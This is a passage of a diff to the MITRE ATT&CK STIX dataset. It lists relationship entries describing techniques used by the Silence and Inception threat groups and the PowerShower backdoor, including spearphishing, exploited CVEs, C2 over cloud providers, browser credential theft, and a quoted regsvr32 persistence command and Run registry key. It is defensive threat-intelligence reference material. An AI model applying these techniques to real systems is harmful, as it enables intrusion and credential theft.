+ "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used RDP for lateral movement.(Citation: Group IB Silence Sept 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--5cc793b0-cc45-439e-a994-c8884ca55fe7",
+ "type": "relationship",
+ "modified": "2020-05-08T17:01:36.169Z",
+ "created": "2020-05-08T17:01:36.169Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has downloaded additional modules and malware to victim\u2019s machines.(Citation: Group IB Silence Sept 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--948146db-f966-4e0c-bbb2-289e2eae6718",
+ "type": "relationship",
+ "modified": "2020-05-08T17:01:36.171Z",
+ "created": "2020-05-08T17:01:36.171Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used weaponized documents attached to spearphishing emails for reconnaissance and initial compromise.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Symantec Inception Framework March 2018)(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--42580e44-781d-467d-b131-45f7d4651d0a",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:43.918Z",
+ "created": "2020-05-08T17:17:37.627Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "tool--b76b2d94-60e4-4107-a903-4a3a7622fb3b",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9b2caa3d-10ae-471b-b0b1-527fbcd006ec",
+ "type": "relationship",
+ "modified": "2020-05-08T17:17:37.635Z",
+ "created": "2020-05-08T17:17:37.635Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used a reconnaissance module to gather information about the operating system and hardware on the infected host.(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--4b3f85b7-a7a4-446f-a3cb-d922268ee879",
+ "type": "relationship",
+ "modified": "2020-05-08T20:02:19.454Z",
+ "created": "2020-05-08T18:41:16.342Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used a reconnaissance module to identify active processes and other associated loaded modules.(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--cece5cb5-3837-4551-be22-5c27b63eae63",
+ "type": "relationship",
+ "modified": "2020-05-12T15:21:21.632Z",
+ "created": "2020-05-08T18:41:16.415Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--16d59476-9fff-413f-9dbe-5c9e43c3860d",
+ "type": "relationship",
+ "modified": "2020-05-20T20:54:12.843Z",
+ "created": "2020-05-08T18:41:16.417Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has ensured persistence at system boot by setting the value regsvr32 %path%\\ctfmonrn.dll /s.(Citation: Kaspersky Cloud Atlas December 2014)",
+ "relationship_type": "uses",
+ "id": "relationship--cab50f6d-3621-4429-8c9a-803df15f4e75",
+ "type": "relationship",
+ "modified": "2020-05-08T18:56:23.074Z",
+ "created": "2020-05-08T18:41:16.419Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c",
+ "external_references": [
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used specific malware modules to gather domain membership.(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--bcf90f77-1b2b-46e2-914b-051e51a2d409",
+ "type": "relationship",
+ "modified": "2020-05-12T15:17:50.112Z",
+ "created": "2020-05-08T18:41:16.422Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has encrypted network communications with AES.(Citation: Kaspersky Cloud Atlas December 2014)",
+ "relationship_type": "uses",
+ "id": "relationship--cd89dfdb-5c48-4a91-ba2f-e3c6e74c5094",
+ "type": "relationship",
+ "modified": "2020-05-08T18:41:16.424Z",
+ "created": "2020-05-08T18:41:16.424Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has maintained persistence by modifying Registry run key value \n HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\.(Citation: Kaspersky Cloud Atlas December 2014)",
+ "relationship_type": "uses",
+ "id": "relationship--1215a807-77b4-465e-9c82-c4f023e668da",
+ "type": "relationship",
+ "modified": "2020-05-12T15:17:50.158Z",
+ "created": "2020-05-08T18:41:16.426Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d",
+ "external_references": [
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) used chains of compromised routers to proxy C2 communications between them and cloud service providers.(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--3bd9165f-6f5f-4c1a-bdbf-47c733d577a8",
+ "type": "relationship",
+ "modified": "2020-05-20T20:54:12.954Z",
+ "created": "2020-05-08T18:41:16.430Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) lured victims into clicking malicious files for machine reconnaissance and to execute malware.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Kaspersky Cloud Atlas August 2019)(Citation: Symantec Inception Framework March 2018)(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--6ee38990-50e9-423d-aea8-c3c16cf98ca4",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:43.919Z",
+ "created": "2020-05-08T18:41:16.433Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) used a browser plugin to steal passwords and sessions from Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex.(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ad3298b6-8cb5-4c4e-b2be-e058273c15be",
+ "type": "relationship",
+ "modified": "2020-05-08T18:41:16.441Z",
+ "created": "2020-05-08T18:41:16.441Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used HTTP, HTTPS, and WebDav in network communications.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--7fcb628d-ce4d-48a4-bb9f-b727fe54e6af",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:43.914Z",
+ "created": "2020-05-08T18:41:16.445Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution.(Citation: Kaspersky Cloud Atlas August 2019)(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Symantec Inception Framework March 2018)(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--b0702a30-f680-4f9b-99c3-352ce2a9557a",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:43.912Z",
+ "created": "2020-05-08T18:41:16.450Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) used a file listing plugin to collect information about file and directories both on local and remote drives.(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--40e6721c-f5fd-4c51-aec9-93b70e7e312c",
+ "type": "relationship",
+ "modified": "2020-05-08T18:41:16.457Z",
+ "created": "2020-05-08T18:41:16.457Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has encrypted malware payloads dropped on victim machines with AES and RC4 encryption.(Citation: Kaspersky Cloud Atlas December 2014)",
+ "relationship_type": "uses",
+ "id": "relationship--01323439-5287-43cd-b7d9-750e606db602",
+ "type": "relationship",
+ "modified": "2020-05-12T15:17:50.196Z",
+ "created": "2020-05-08T18:41:16.460Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used decoy documents to load malicious remote payloads via HTTP.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--c597beea-3bcd-45ee-a400-5b615f9ae621",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:43.952Z",
+ "created": "2020-05-08T18:56:22.967Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used VBScript to execute malicious commands and payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas December 2014)",
+ "relationship_type": "uses",
+ "id": "relationship--c4c1e4e6-5662-42cd-86e1-fa7b3c82f84c",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.004Z",
+ "created": "2020-05-08T18:56:22.979Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used PowerShell to execute malicious commands and payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas December 2014)",
+ "relationship_type": "uses",
+ "id": "relationship--5b2457a6-a2b8-4809-a2a0-68d1c74bbb9b",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.006Z",
+ "created": "2020-05-08T18:56:22.995Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) is a backdoor written in PowerShell.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--47747638-0f8d-4735-b16d-b52861dec73f",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.164Z",
+ "created": "2020-05-08T19:27:12.495Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has the ability to save and execute VBScript.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--f5f463d9-d604-406e-89f3-dbf26ef74a69",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:44.159Z",
+ "created": "2020-05-08T19:27:12.526Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.(Citation: Unit 42 Inception November 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--a3bdd37c-f82c-4df3-94f8-63495466565c",
+ "type": "relationship",
+ "modified": "2020-05-20T20:43:50.155Z",
+ "created": "2020-05-08T19:27:12.535Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
